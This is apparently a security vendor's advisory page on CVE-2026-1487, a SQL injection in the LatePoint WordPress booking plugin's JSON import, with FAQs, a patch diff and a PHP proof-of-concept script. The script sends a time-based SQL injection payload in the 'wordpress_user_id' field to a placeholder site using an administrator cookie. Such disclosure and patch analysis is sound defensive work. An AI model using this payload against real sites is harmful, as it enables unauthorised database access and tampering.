What is CVE-2026-1487?

CVE-2026-1487 is a medium severity SQL injection vulnerability found in the LatePoint Calendar Booking Plugin for WordPress. It allows authenticated users with Administrator-level access to execute arbitrary SQL queries via the JSON import functionality, potentially leading to data extraction or modification.

How does the SQL injection work?

The vulnerability arises from insufficient validation of user-supplied JSON data during the import process. An attacker can craft a malicious JSON payload that includes SQL injection code in the ‘wordpress_user_id’ field, which is then executed when the data is processed by the database.

Who is affected by this vulnerability?

All users of the LatePoint plugin version 5.2.7 and earlier are affected. Specifically, only authenticated users with Administrator privileges can exploit this vulnerability, making it critical for site administrators to assess their user roles.

How can I check if my site is vulnerable?

To check if your site is vulnerable, verify the version of the LatePoint plugin installed. If it is version 5.2.7 or earlier, your site is at risk. Additionally, review user roles to ensure that only trusted individuals have Administrator access.

How can I fix this vulnerability?

The vulnerability is patched in version 5.2.8 of the LatePoint plugin. Update your plugin to this version or later to mitigate the risk. Regularly check for updates to ensure ongoing security.

What does a CVSS score of 6.5 mean?

A CVSS score of 6.5 indicates a medium severity vulnerability. This suggests that while the risk is significant, it requires specific conditions to be exploited, such as authenticated access, making it less critical than high-severity vulnerabilities.

What are the practical risks of this vulnerability?

If exploited, this vulnerability could allow an attacker to execute arbitrary SQL commands, leading to unauthorized access to sensitive data, data modification, or even deletion of database tables. This could have severe implications for data integrity and security.

What is a proof of concept (PoC)?

A proof of concept is a demonstration that illustrates how a vulnerability can be exploited. In this case, the PoC provided shows how an attacker can use a crafted JSON payload to execute a time-based SQL injection, confirming the existence and impact of the vulnerability.

What should I do if I cannot update the plugin immediately?

If immediate updating is not feasible, consider restricting Administrator access to trusted users only and monitoring for unusual database activity. Additionally, review your site’s security settings and consider implementing a web application firewall to help block potential attacks.

Where can I find more information about this vulnerability?

More information about CVE-2026-1487 can be found on the official CVE database and security advisories related to the LatePoint plugin. Additionally, following security blogs and forums can provide updates and community insights on vulnerabilities.

What are the implications of insufficient validation in plugins?

Insufficient validation in plugins can lead to various vulnerabilities, including SQL injection, cross-site scripting, and more. It highlights the importance of rigorous input validation and sanitization practices during development to prevent exploitation.

How can I enhance my WordPress site's security?

To enhance your WordPress site’s security, regularly update all plugins and themes, use strong passwords, limit user access based on roles, and implement security plugins that provide monitoring and firewall features.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : March 18, 2026

CVE-2026-1487: LatePoint <= 5.2.7 – Authenticated (Administrator+) SQL Injection via JSON Import (latepoint)

CVE ID CVE-2026-1487

Plugin latepoint

Severity Medium (CVSS 6.5)

CWE 89

Vulnerable Version 5.2.7

Patched Version 5.2.8

Disclosed March 1, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-1487:
The vulnerability exists in the JSON import functionality of the LatePoint plugin. The root cause is insufficient validation and sanitization of user-supplied JSON data during the import process, specifically within the `import_json` method of the `OsSettingsHelper` class. The plugin’s `import_json` method in `latepoint/lib/helpers/settings_helper.php` processes JSON data containing table definitions and row data. When inserting data into the `latepoint_customers` table, the method previously allowed direct assignment of the `wordpress_user_id` field from user-controlled JSON input. This field is a foreign key linking to the WordPress users table. An attacker with Administrator privileges can craft a malicious JSON import payload containing a SQL injection payload within the `wordpress_user_id` value. The payload executes when the `$wpdb->insert()` function processes the row data. The patch in version 5.2.8 adds a security check in the `import_json` method (lines 234-237) that explicitly unsets the `wordpress_user_id` field from the row data array before insertion if the target table is the customers table. This prevents the attacker-controlled value from reaching the database query. The patch also adds `SELECT` and `UNION` to the dangerous keywords list for CREATE statement validation. Exploitation requires Administrator-level access. Successful exploitation allows arbitrary SQL query execution, enabling data extraction, modification, or deletion.

Differential between vulnerable and patched code

Code Diff

--- a/latepoint/latepoint.php
+++ b/latepoint/latepoint.php
@@ -2,7 +2,7 @@
 /**
  * Plugin Name: LatePoint
  * Description: Appointment Scheduling Software for WordPress
- * Version: 5.2.7
+ * Version: 5.2.8
  * Author: LatePoint
  * Author URI: https://latepoint.com
  * Plugin URI: https://latepoint.com
@@ -29,7 +29,7 @@
 		 * LatePoint version.
 		 *
 		 */
-		public $version = '5.2.7';
+		public $version = '5.2.8';
 		public $db_version = '2.3.0';


--- a/latepoint/lib/controllers/booking_form_settings_controller.php
+++ b/latepoint/lib/controllers/booking_form_settings_controller.php
@@ -23,6 +23,9 @@
 		}

 		public function reload_preview() {
+			// Verify nonce.
+			$this->check_nonce( 'reload_preview' );
+
 			OsStepsHelper::set_cart_object();
 			OsStepsHelper::set_booking_object();
 			OsStepsHelper::set_restrictions();
--- a/latepoint/lib/controllers/customers_controller.php
+++ b/latepoint/lib/controllers/customers_controller.php
@@ -150,7 +150,8 @@
 			$this->check_nonce( 'new_customer' );
 			$customer = new OsCustomerModel();
 			// Security fix: Prevent mass assignment of wordpress_user_id by non-admin users.
-			$customer->set_data( $this->params['customer'], LATEPOINT_PARAMS_SCOPE_PUBLIC );
+			// Use admin scope if user is authenticated as admin, otherwise restrict to public fields.
+			$customer->set_data( $this->params['customer'], OsAuthHelper::is_admin_logged_in() ? LATEPOINT_PARAMS_SCOPE_ADMIN : LATEPOINT_PARAMS_SCOPE_PUBLIC );
 			if ( $customer->save() ) {
 				// translators: %s is the html of a customer edit link
 				$response_html = sprintf( __( 'Customer Created ID: %s', 'latepoint' ), '<span class="os-notification-link" ' . OsCustomerHelper::quick_customer_btn_html( $customer->id ) . '>' . $customer->id . '</span>' );
@@ -180,7 +181,8 @@
 				} else {
 					$old_customer_data = $customer->get_data_vars();
 					// Security fix: Prevent mass assignment of wordpress_user_id by non-admin users.
-					$customer->set_data( $this->params['customer'], LATEPOINT_PARAMS_SCOPE_PUBLIC );
+					// Use admin scope if user is authenticated as admin, otherwise restrict to public fields.
+					$customer->set_data( $this->params['customer'], OsAuthHelper::is_admin_logged_in() ? LATEPOINT_PARAMS_SCOPE_ADMIN : LATEPOINT_PARAMS_SCOPE_PUBLIC );
 					if ( $customer->save() ) {
 						// translators: %s is the html of a customer edit link
 						$response_html = sprintf( __( 'Customer Updated ID: %s', 'latepoint' ), '<span class="os-notification-link" ' . OsCustomerHelper::quick_customer_btn_html( $customer->id ) . '>' . $customer->id . '</span>' );
--- a/latepoint/lib/controllers/orders_controller.php
+++ b/latepoint/lib/controllers/orders_controller.php
@@ -131,8 +131,8 @@
 				$is_new_customer = true;
 			}
 			// Security fix: Prevent mass assignment of wordpress_user_id by non-admin users.
-			// Use 'public' role to restrict which fields can be set via user input.
-			$customer->set_data( $customer_params, LATEPOINT_PARAMS_SCOPE_PUBLIC );
+			// Use admin scope if user is authenticated as admin, otherwise restrict to public fields.
+			$customer->set_data( $customer_params, OsAuthHelper::is_admin_logged_in() ? LATEPOINT_PARAMS_SCOPE_ADMIN : LATEPOINT_PARAMS_SCOPE_PUBLIC );
 			if ( $customer->save() ) {
 				if ( $is_new_customer ) {
 					do_action( 'latepoint_customer_created', $customer );
--- a/latepoint/lib/helpers/customer_import_helper.php
+++ b/latepoint/lib/helpers/customer_import_helper.php
@@ -181,7 +181,7 @@
 					$save_data[$column_mapping[$column_index]] = $field_value;
 				}
 			}
-			$customer->set_data($save_data);
+			$customer->set_data($save_data, 'public');

 			if ($customer->save()) {
 				$updatedCount++;
--- a/latepoint/lib/helpers/settings_helper.php
+++ b/latepoint/lib/helpers/settings_helper.php
@@ -208,7 +208,7 @@
 			}

 			// Security check: Ensure no dangerous SQL keywords in CREATE statement.
-			$dangerous_keywords = array( 'EXEC', 'EXECUTE', 'CALL', 'LOAD_FILE', 'INTO OUTFILE', 'INTO DUMPFILE' );
+			$dangerous_keywords = array( 'SELECT', 'UNION', 'EXEC', 'EXECUTE', 'CALL', 'LOAD_FILE', 'INTO OUTFILE', 'INTO DUMPFILE' );
 			foreach ( $dangerous_keywords as $keyword ) {
 				if ( stripos( $create_statement, $keyword ) !== false ) {
 					throw new Exception( sprintf( __( 'Security: Dangerous SQL keyword "%s" detected in CREATE statement', 'latepoint' ), esc_html( $keyword ) ) );
@@ -231,6 +231,11 @@
 			if ( is_array( $table_data['data'] ) ) {
 				foreach ( $table_data['data'] as $row ) {
 					if ( is_array( $row ) ) {
+						// Security fix: Prevent mass assignment of wordpress_user_id during import.
+						if ( $table === $wpdb->prefix . 'latepoint_customers' ) {
+							unset( $row['wordpress_user_id'] );
+						}
+
 						$insert_result = $wpdb->insert( $table, $row );
 						if ( $insert_result === false ) {
 							// Log error but continue with other rows.
--- a/latepoint/lib/views/booking_form_settings/_booking_form_preview.php
+++ b/latepoint/lib/views/booking_form_settings/_booking_form_preview.php
@@ -20,20 +20,37 @@
                     </div>
                 </div>
 				<div class="bf-side-heading editable-setting" data-setting-key="[<?php echo esc_attr($selected_step_code);?>][side_panel_heading]" contenteditable="true"><?php echo wp_strip_all_tags(OsStepsHelper::get_step_setting_value($selected_step_code, 'side_panel_heading')); ?></div>
-				<div class="bf-side-desc os-editable-basic editable-setting" data-setting-key="[<?php echo $selected_step_code;?>][side_panel_description]"><?php echo strip_tags(OsStepsHelper::get_step_setting_value($selected_step_code, 'side_panel_description'), ['a', 'i', 'u', 'b', 'br']); ?></div>
+				<div
+					class="bf-side-desc os-editable-basic editable-setting"
+					data-setting-key="[<?php echo esc_attr( $selected_step_code ); ?>][side_panel_description]"
+				>
+					<?php echo strip_tags( OsStepsHelper::get_step_setting_value( $selected_step_code, 'side_panel_description' ), [ 'a', 'i', 'u', 'b', 'br' ] ); ?>
+				</div>
 			</div>
 			<div class="side-panel-extra os-editable editable-setting" data-setting-key="[shared][steps_support_text]">
-				<?php echo OsSettingsHelper::get_steps_support_text(); ?>
+				<?php echo wp_kses_post( OsSettingsHelper::get_steps_support_text() ); ?>
 			</div>
 		</div>
 		<div class="bf-main-panel">
 			<div class="bf-main-heading editable-setting" data-setting-key="[<?php echo esc_attr($selected_step_code);?>][main_panel_heading]" contenteditable="true"><?php echo wp_strip_all_tags(OsStepsHelper::get_step_setting_value($selected_step_code, 'main_panel_heading')); ?></div>
 			<div class="bf-main-panel-content-wrapper">
-				<div class="bf-main-panel-content-before os-editable editable-setting" data-placeholder="+" data-setting-key="[<?php echo esc_attr($selected_step_code);?>][main_panel_content_before]"><?php echo OsStepsHelper::get_step_setting_value($selected_step_code, 'main_panel_content_before'); ?></div>
+				<div
+					class="bf-main-panel-content-before os-editable editable-setting"
+					data-placeholder="+"
+					data-setting-key="[<?php echo esc_attr( $selected_step_code ); ?>][main_panel_content_before]"
+				>
+					<?php echo wp_kses_post( OsStepsHelper::get_step_setting_value( $selected_step_code, 'main_panel_content_before' ) ); ?>
+				</div>
 				<div class="bf-main-panel-content">
 					<?php echo OsStepsHelper::get_step_content_preview($selected_step_code); ?>
 				</div>
-				<div class="bf-main-panel-content-after os-editable editable-setting" data-placeholder="+" data-setting-key="[<?php echo esc_attr($selected_step_code);?>][main_panel_content_after]"><?php echo OsStepsHelper::get_step_setting_value($selected_step_code, 'main_panel_content_after'); ?></div>
+				<div
+					class="bf-main-panel-content-after os-editable editable-setting"
+					data-placeholder="+"
+					data-setting-key="[<?php echo esc_attr( $selected_step_code ); ?>][main_panel_content_after]"
+				>
+					<?php echo wp_kses_post( OsStepsHelper::get_step_setting_value( $selected_step_code, 'main_panel_content_after' ) ); ?>
+				</div>
 			</div>
 			<div class="bf-main-panel-buttons">
                 <div class="bf-btn bf-cancel-save-btn">
--- a/latepoint/lib/views/booking_form_settings/show.php
+++ b/latepoint/lib/views/booking_form_settings/show.php
@@ -14,6 +14,7 @@
     </div>
     <form class="booking-form-preview-settings"
           data-route-name="<?php echo esc_attr(OsRouterHelper::build_route_name( 'booking_form_settings', 'reload_preview' )); ?>">
+        <?php wp_nonce_field( 'reload_preview', '_wpnonce', false ); ?>
         <div class="bf-heading">
             <div class="latepoint-icon latepoint-icon-browser"></div>
             <div><?php esc_html_e( 'Appearance', 'latepoint' ); ?></div>

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-1487 - LatePoint <= 5.2.7 - Authenticated (Administrator+) SQL Injection via JSON Import
<?php
$target_url = 'http://target.site/wp-admin/admin-ajax.php';
$admin_cookie = 'wordpress_logged_in_xxxx=...';

$payload = array(
    'action' => 'latepoint_route_call',
    'route_name' => 'settings__import_json',
    'nonce' => 'valid_nonce_required', // Requires a valid nonce from an admin session
    'json_data' => '{"tables":[{"name":"wp_latepoint_customers","data":[{"first_name":"test","last_name":"user","email":"test@example.com","wordpress_user_id":"1' AND (SELECT 1 FROM (SELECT(SLEEP(5)))a)-- "}]}]}'
);

$ch = curl_init($target_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $payload);
curl_setopt($ch, CURLOPT_COOKIE, $admin_cookie);
curl_setopt($ch, CURLOPT_HEADER, true);

$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
$time = curl_getinfo($ch, CURLINFO_TOTAL_TIME);
curl_close($ch);

if ($time >= 5) {
    echo "Potential SQL Injection successful (time-based delay detected).n";
} else {
    echo "Request completed in $time seconds.n";
}
echo "HTTP Code: $http_coden";
?>

Frequently Asked Questions

What is CVE-2026-1487?
Overview of the vulnerability
CVE-2026-1487 is a medium severity SQL injection vulnerability found in the LatePoint Calendar Booking Plugin for WordPress. It allows authenticated users with Administrator-level access to execute arbitrary SQL queries via the JSON import functionality, potentially leading to data extraction or modification.
How does the SQL injection work?
Mechanism of exploitation
The vulnerability arises from insufficient validation of user-supplied JSON data during the import process. An attacker can craft a malicious JSON payload that includes SQL injection code in the ‘wordpress_user_id’ field, which is then executed when the data is processed by the database.
Who is affected by this vulnerability?
Identifying affected users
All users of the LatePoint plugin version 5.2.7 and earlier are affected. Specifically, only authenticated users with Administrator privileges can exploit this vulnerability, making it critical for site administrators to assess their user roles.
How can I check if my site is vulnerable?
Verification steps
To check if your site is vulnerable, verify the version of the LatePoint plugin installed. If it is version 5.2.7 or earlier, your site is at risk. Additionally, review user roles to ensure that only trusted individuals have Administrator access.
How can I fix this vulnerability?
Patch and update guidance
The vulnerability is patched in version 5.2.8 of the LatePoint plugin. Update your plugin to this version or later to mitigate the risk. Regularly check for updates to ensure ongoing security.
What does a CVSS score of 6.5 mean?
Understanding severity ratings
A CVSS score of 6.5 indicates a medium severity vulnerability. This suggests that while the risk is significant, it requires specific conditions to be exploited, such as authenticated access, making it less critical than high-severity vulnerabilities.
What are the practical risks of this vulnerability?
Potential impacts on your site
If exploited, this vulnerability could allow an attacker to execute arbitrary SQL commands, leading to unauthorized access to sensitive data, data modification, or even deletion of database tables. This could have severe implications for data integrity and security.
What is a proof of concept (PoC)?
Demonstrating the vulnerability
A proof of concept is a demonstration that illustrates how a vulnerability can be exploited. In this case, the PoC provided shows how an attacker can use a crafted JSON payload to execute a time-based SQL injection, confirming the existence and impact of the vulnerability.
What should I do if I cannot update the plugin immediately?
Temporary mitigation strategies
If immediate updating is not feasible, consider restricting Administrator access to trusted users only and monitoring for unusual database activity. Additionally, review your site’s security settings and consider implementing a web application firewall to help block potential attacks.
Where can I find more information about this vulnerability?
Resources for further reading
More information about CVE-2026-1487 can be found on the official CVE database and security advisories related to the LatePoint plugin. Additionally, following security blogs and forums can provide updates and community insights on vulnerabilities.
What are the implications of insufficient validation in plugins?
Understanding security practices
Insufficient validation in plugins can lead to various vulnerabilities, including SQL injection, cross-site scripting, and more. It highlights the importance of rigorous input validation and sanitization practices during development to prevent exploitation.
How can I enhance my WordPress site's security?
Best practices for security
To enhance your WordPress site’s security, regularly update all plugins and themes, use strong passwords, limit user access based on roles, and implement security plugins that provide monitoring and firewall features.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations